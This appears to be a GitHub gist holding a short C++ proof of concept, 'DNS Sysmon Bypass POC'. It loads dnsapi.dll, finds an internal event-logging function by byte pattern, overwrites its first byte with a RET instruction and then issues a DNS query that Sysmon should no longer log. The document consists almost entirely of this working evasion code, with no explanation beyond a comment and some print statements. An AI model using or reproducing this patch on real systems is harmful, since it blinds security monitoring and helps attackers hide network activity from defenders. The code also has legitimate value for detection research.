-
-
Save Jumbo-WJB/2c4c722b1bd82d17f70c3ec5a7b216a3 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <iostream> | |
| #include <Windows.h> | |
| #include <WinDNS.h> | |
| // Pattern for hunting dnsapi!McTemplateU0zqxqz | |
| #define PATTERN (unsigned char*)"\x48\x89\x5c\x24\x08\x44\x89\x4c\x24\x20\x55\x48\x8d\x6c" | |
| #define PATTERN_LEN 14 | |
| // Search for pattern in memory | |
| DWORD SearchPattern(unsigned char* mem, unsigned char* signature, DWORD signatureLen) { | |
| ULONG offset = 0; | |
| for (int i = 0; i < 0x200000; i++) { | |
| if (*(unsigned char*)(mem + i) == signature[0] && *(unsigned char*)(mem + i + 1) == signature[1]) { | |
| if (memcmp(mem + i, signature, signatureLen) == 0) { | |
| // Found the signature | |
| offset = i; | |
| break; | |
| } | |
| } | |
| } | |
| return offset; | |
| } | |
| int main() | |
| { | |
| DWORD oldProtect, oldOldProtect; | |
| printf("DNS Sysmon Bypass POC\n by @_xpn_\n\n"); | |
| unsigned char *dll = (unsigned char *)LoadLibraryA("dnsapi.dll"); | |
| if (dll == (void*)0) { | |
| printf("[x] Could not load dnsapi.dll\n"); | |
| return 1; | |
| } | |
| DWORD patternOffset = SearchPattern(dll, PATTERN, PATTERN_LEN); | |
| printf("[*] Pattern found at offset %d\n", patternOffset); | |
| printf("[*] Patching with RET\n"); | |
| VirtualProtect(dll + patternOffset, 10, PAGE_EXECUTE_READWRITE, &oldProtect); | |
| *(dll + patternOffset) = 0xc3; | |
| VirtualProtect(dll, 10, oldProtect, &oldOldProtect); | |
| printf("[*] Sending DNS Query... should now not be detected\n"); | |
| DnsQuery_A("blog.xpnsec.com", DNS_TYPE_A, DNS_QUERY_STANDARD, NULL, NULL, NULL); | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment